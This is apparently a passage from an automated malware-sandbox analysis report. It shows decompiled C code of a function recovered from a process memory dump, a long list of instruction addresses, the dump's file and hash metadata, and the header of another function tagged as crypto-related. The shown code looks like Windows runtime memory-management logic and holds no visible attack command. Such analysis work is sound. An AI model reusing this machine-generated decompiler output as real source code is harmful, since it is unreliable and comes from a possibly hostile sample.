						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x49a60e8;
								if( *0x49a60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x49a60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E048F9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E048F6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E048FF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E048FF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E048FF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E048FFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E048FFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E048FF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E048FF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04984CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0490D130(_t427, _t494, _t511);
				}
			}










































































                                                            0x04985ba5
                                                            0x04985baa
                                                            0x04985baf
                                                            0x04985bb4
                                                            0x04985bb6
                                                            0x04985bbc
                                                            0x04985bbe
                                                            0x04985bc4
                                                            0x04985bcd
                                                            0x04985bd3
                                                            0x04985bd6
                                                            0x04985bdc
                                                            0x04985be0
                                                            0x04985be3
                                                            0x04985beb
                                                            0x04985bf2
                                                            0x04985bf8
                                                            0x04985bfe
                                                            0x04985c04
                                                            0x04985c0e
                                                            0x04985c18
                                                            0x04985c1f
                                                            0x04985c25
                                                            0x04985c2a
                                                            0x04985c2c
                                                            0x04985c32
                                                            0x04985c3a
                                                            0x04985c3f
                                                            0x04985c42
                                                            0x04985c48
                                                            0x04985c5b
                                                            0x04985c5b
                                                            0x04985c2c
                                                            0x04985cb7
                                                            0x04985cb9
                                                            0x04985cbf
                                                            0x04985cc2
                                                            0x04985cca
                                                            0x04985ccb
                                                            0x04985ccb
                                                            0x04985cd1
                                                            0x04985cd7
                                                            0x04985cda
                                                            0x04985ce1
                                                            0x04985ce4
                                                            0x04985ce7
                                                            0x04985ced
                                                            0x04985cf3
                                                            0x04985cf9
                                                            0x04985cff
                                                            0x04985d08
                                                            0x04985d0a
                                                            0x04985d0e
                                                            0x04985d10
                                                            0x00000000
                                                            0x00000000
                                                            0x04985d16
                                                            0x04985d1a
                                                            0x00000000
                                                            0x00000000
                                                            0x04985d20
                                                            0x04985d22
                                                            0x04985d25
                                                            0x04985d2f
                                                            0x04985d2f
                                                            0x04985d33
                                                            0x04985d3d
                                                            0x04985d49
                                                            0x04985d4b
                                                            0x00000000
                                                            0x00000000
                                                            0x04985d5a
                                                            0x04985d5d
                                                            0x04985d60
                                                            0x00000000
                                                            0x00000000
                                                            0x04985d66
                                                            0x04985d69
                                                            0x00000000
                                                            0x00000000
                                                            0x04985d6f
                                                            0x04985d6f
                                                            0x04985d73
                                                            0x04985d79
                                                            0x04985d7f
                                                            0x04985d86
                                                            0x04985d95
                                                            0x04985d98
                                                            0x04985dba
                                                            0x04985dcb
                                                            0x04985dce
                                                            0x04985dd3
                                                            0x04985dd6
                                                            0x04985dd8
                                                            0x04985de6
                                                            0x04985dec
                                                            0x04985dee
                                                            0x04985df1
                                                            0x04985df3
                                                            0x0498635a
                                                            0x0498635a
                                                            0x00000000
                                                            0x0498635a
                                                            0x04985dfe
                                                            0x04985e02
                                                            0x04985e05
                                                            0x04985e07
                                                            0x04985e10
                                                            0x04985e13
                                                            0x04985e1b
                                                            0x04985e1c
                                                            0x04985e21
                                                            0x04985e22
                                                            0x04985e23
                                                            0x04985e25
                                                            0x04985e2a
                                                            0x04985e2c
                                                            0x04985e2e
                                                            0x04985e36
                                                            0x04985e39
                                                            0x04985e42
                                                            0x04985e47
                                                            0x04985e4d
                                                            0x04985e54
                                                            0x04985e54
                                                            0x04985e54
                                                            0x04985e2e
                                                            0x04985e5c
                                                            0x04985e5f
                                                            0x04985e62
                                                            0x04985e64
                                                            0x04985e6b
                                                            0x04985e70
                                                            0x04985e7a
                                                            0x04985e7a
                                                            0x04985e7a
                                                            0x04985e6b
                                                            0x04985e7e
                                                            0x04985e7f
                                                            0x04985e7f
                                                            0x04985e81
                                                            0x04985e87
                                                            0x04985e8b
                                                            0x04985e8c
                                                            0x04985e8c
                                                            0x04985e8c
                                                            0x04985e9a
                                                            0x04985e9c
                                                            0x04985ea2
                                                            0x04985ea6
                                                            0x04985f50
                                                            0x04985f50
                                                            0x04985f57
                                                            0x04985f66
                                                            0x04985f66
                                                            0x04985f66
                                                            0x04985f68
                                                            0x04985f6a
                                                            0x049863d0
                                                            0x00000000
                                                            0x04985f70
                                                            0x04985f70
                                                            0x04985f91
                                                            0x04985f9c
                                                            0x04985f9e
                                                            0x04985fa4
                                                            0x04985fa6
                                                            0x0498638c
                                                            0x04986392
                                                            0x049863a1
                                                            0x049863a7
                                                            0x049863af
                                                            0x049863af
                                                            0x049863bd
                                                            0x049863d8
                                                            0x00000000
                                                            0x049863d8
                                                            0x04985fac
                                                            0x04985fb2
                                                            0x04985fb4
                                                            0x04985fbd
                                                            0x04985fc6
                                                            0x04985fce
                                                            0x04985fd4
                                                            0x04985fdc
                                                            0x04985fec
                                                            0x04985fed
                                                            0x04985fee
                                                            0x04985fef
                                                            0x04985ff9
                                                            0x04985ffa
                                                            0x04985ffb
                                                            0x04985ffc
                                                            0x04986000
                                                            0x04986004
                                                            0x04986012
                                                            0x04986012
                                                            0x04986018
                                                            0x04986019
                                                            0x0498601a
                                                            0x0498601b
                                                            0x0498601c
                                                            0x04986020
                                                            0x04986059
                                                            0x0498605c
                                                            0x04986061
                                                            0x04986061
                                                            0x04986022
                                                            0x04986022
                                                            0x04986022
                                                            0x04986025
                                                            0x0498602a
                                                            0x0498602b
                                                            0x04986031
                                                            0x04986037
                                                            0x04986038
                                                            0x0498603e
                                                            0x04986048
                                                            0x04986049
                                                            0x0498604a
                                                            0x0498604b
                                                            0x0498604c
                                                            0x0498604d
                                                            0x04986053
                                                            0x04986054
                                                            0x04986054
                                                            0x04986062
                                                            0x04986065
                                                            0x04986067
                                                            0x0498606a
                                                            0x04986070
                                                            0x04986075
                                                            0x04986076
                                                            0x04986081
                                                            0x04986087
                                                            0x04986095
                                                            0x04986099
                                                            0x0498609e
                                                            0x049860a4
                                                            0x049860ae
                                                            0x049860b0
                                                            0x049860b3
                                                            0x049860b6
                                                            0x049860b8
                                                            0x049860ba
                                                            0x049860ba
                                                            0x049860ba
                                                            0x049860ba
                                                            0x049860be
                                                            0x049860c0
                                                            0x049860c5
                                                            0x049860c5
                                                            0x049860c5
                                                            0x049860c6
                                                            0x049860cd
                                                            0x04986114
                                                            0x049860cf
                                                            0x049860cf
                                                            0x049860d4
                                                            0x049860d5
                                                            0x049860da
                                                            0x049860db
                                                            0x049860e1
                                                            0x049860e2
                                                            0x049860e8
                                                            0x049860f8
                                                            0x049860fd
                                                            0x049860fe
                                                            0x04986102
                                                            0x04986104
                                                            0x04986107
                                                            0x04986109
                                                            0x0498610b
                                                            0x0498610b
                                                            0x0498610b
                                                            0x0498610b
                                                            0x0498610f
                                                            0x0498610f
                                                            0x04986117
                                                            0x0498611a
                                                            0x0498611f
                                                            0x04986125
                                                            0x04986134
                                                            0x04986139
                                                            0x0498613f
                                                            0x04986146
                                                            0x04986148
                                                            0x0498614b
                                                            0x0498614d
                                                            0x0498614f
                                                            0x0498614f
                                                            0x0498614f
                                                            0x0498614f
                                                            0x04986153
                                                            0x04986159
                                                            0x04986159
                                                            0x0498615c
                                                            0x04986163
                                                            0x04986169
                                                            0x0498616c
                                                            0x04986172
                                                            0x04986181
                                                            0x04986186
                                                            0x04986187
                                                            0x0498618b
                                                            0x04986191
                                                            0x04986195
                                                            0x049861a3
                                                            0x049861bb
                                                            0x049861c0
                                                            0x049861c3
                                                            0x049861cc
                                                            0x049861d0
                                                            0x049861dc
                                                            0x049861de
                                                            0x049861e1
                                                            0x049861e4
                                                            0x049861e6
                                                            0x049861e8
                                                            0x049861e8
                                                            0x049861e8
                                                            0x049861e8
                                                            0x049861e6
                                                            0x049861ec
                                                            0x049861f3
                                                            0x04986203
                                                            0x04986209
                                                            0x0498620a
                                                            0x04986216
                                                            0x0498621d
                                                            0x04986227
                                                            0x04986241
                                                            0x04986246
                                                            0x0498624c
                                                            0x04986257
                                                            0x04986259
                                                            0x0498625c
                                                            0x0498625e
                                                            0x04986260
                                                            0x04986260
                                                            0x04986260
                                                            0x04986260
                                                            0x0498625e
                                                            0x04986264
                                                            0x04986267
                                                            0x04986269
                                                            0x04986315
                                                            0x04986315
                                                            0x0498631b
                                                            0x0498631e
                                                            0x04986324
                                                            0x04986327
                                                            0x0498632f
                                                            0x04986330
                                                            0x04986333
                                                            0x0498633a
                                                            0x0498633c
                                                            0x04986335
                                                            0x04986335
                                                            0x04986335
                                                            0x0498633f
                                                            0x04986342
                                                            0x0498634c
                                                            0x04986352
                                                            0x04986355
                                                            0x04986355
                                                            0x04986359
                                                            0x00000000
                                                            0x0498626f
                                                            0x04986275
                                                            0x04986275
                                                            0x04986278
                                                            0x0498627e
                                                            0x0498627e
                                                            0x04986281
                                                            0x04986287
                                                            0x0498628d
                                                            0x04986298
                                                            0x0498629c
                                                            0x049862a2
                                                            0x0498629e
                                                            0x0498629e
                                                            0x0498629e
                                                            0x049862a7
                                                            0x049862a7
                                                            0x049862aa
                                                            0x049862b0
                                                            0x049862f0
                                                            0x049862f0
                                                            0x049862f2
                                                            0x049862f8
                                                            0x049862fd
                                                            0x049862b2
                                                            0x049862b2
                                                            0x049862b2
                                                            0x049862b5
                                                            0x049862dd
                                                            0x049862e2
                                                            0x049862e5
                                                            0x049862b7
                                                            0x049862b8
                                                            0x049862bb
                                                            0x049862bd
                                                            0x049862c0
                                                            0x049862c4
                                                            0x049862cd
                                                            0x049862cd
                                                            0x049862c0
                                                            0x049862bb
                                                            0x049862b5
                                                            0x04986302
                                                            0x04986303
                                                            0x04986305
                                                            0x04986305
                                                            0x04986305
                                                            0x0498630c
                                                            0x0498630c
                                                            0x00000000
                                                            0x0498627e
                                                            0x04986269
                                                            0x04985eac
                                                            0x04985ebb
                                                            0x04985ebe
                                                            0x04985ecb
                                                            0x04985ecb
                                                            0x04985ece
                                                            0x04985ece
                                                            0x04985ed4
                                                            0x04985ed7
                                                            0x04985ed9
                                                            0x04985edb
                                                            0x04985edb
                                                            0x04985ee1
                                                            0x04985ee1
                                                            0x04985ee3
                                                            0x04985f20
                                                            0x04985f20
                                                            0x04985ee5
                                                            0x04985ee5
                                                            0x04985ee5
                                                            0x04985ee8
                                                            0x04985f11
                                                            0x04985f18
                                                            0x04985eea
                                                            0x04985eea
                                                            0x04985eed
                                                            0x04985ef2
                                                            0x04985ef8
                                                            0x04985efb
                                                            0x04985f0a
                                                            0x04985f0a
                                                            0x04985eed
                                                            0x04985ee8
                                                            0x04985f22
                                                            0x04985f28
                                                            0x00000000
                                                            0x00000000
                                                            0x04985f30
                                                            0x04985f31
                                                            0x04985f37
                                                            0x04985f3a
                                                            0x04985f3d
                                                            0x04985f44
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04985f46
                                                            0x04985f48
                                                            0x04985f4d
                                                            0x00000000
                                                            0x04985f4d
                                                            0x04985dda
                                                            0x04985ddf
                                                            0x00000000
                                                            0x04985ddf
                                                            0x04985dd8
                                                            0x04985da7
                                                            0x04985da9
                                                            0x04985dac
                                                            0x04985dae
                                                            0x00000000
                                                            0x04985db4
                                                            0x04985db4
                                                            0x00000000
                                                            0x04985db4
                                                            0x04985dae
                                                            0x04985d88
                                                            0x04985d8d
                                                            0x04986363
                                                            0x04986369
                                                            0x0498636a
                                                            0x04986370
                                                            0x04986372
                                                            0x0498637a
                                                            0x0498637b
                                                            0x0498637d
                                                            0x00000000
                                                            0x00000000
                                                            0x0498637f
                                                            0x04986385
                                                            0x00000000
                                                            0x04986385
                                                            0x04985d38
                                                            0x04985d3b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04985d3b
                                                            0x04985d27
                                                            0x04985d29
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04986360
                                                            0x00000000
                                                            0x04986360
                                                            0x04985c10
                                                            0x04985c10
                                                            0x049863da
                                                            0x049863e5
                                                            0x049863e5

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a83832173150e0a3e7e13ad809a110247807c8f33e21146750f09ee6c1682d18
                                                            • Instruction ID: d0ee499899e8d1357352beeec51dd79c5414885df24f32f2bf576df91104d79f
                                                            • Opcode Fuzzy Hash: a83832173150e0a3e7e13ad809a110247807c8f33e21146750f09ee6c1682d18
                                                            • Instruction Fuzzy Hash: 1F427971A00229DFDB24DF68C880BA9BBB5FF45304F1581AED94DEB242E734A985CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048D4120, Relevance: .4, Instructions: 444COMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 92%
                                                            			E048D4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
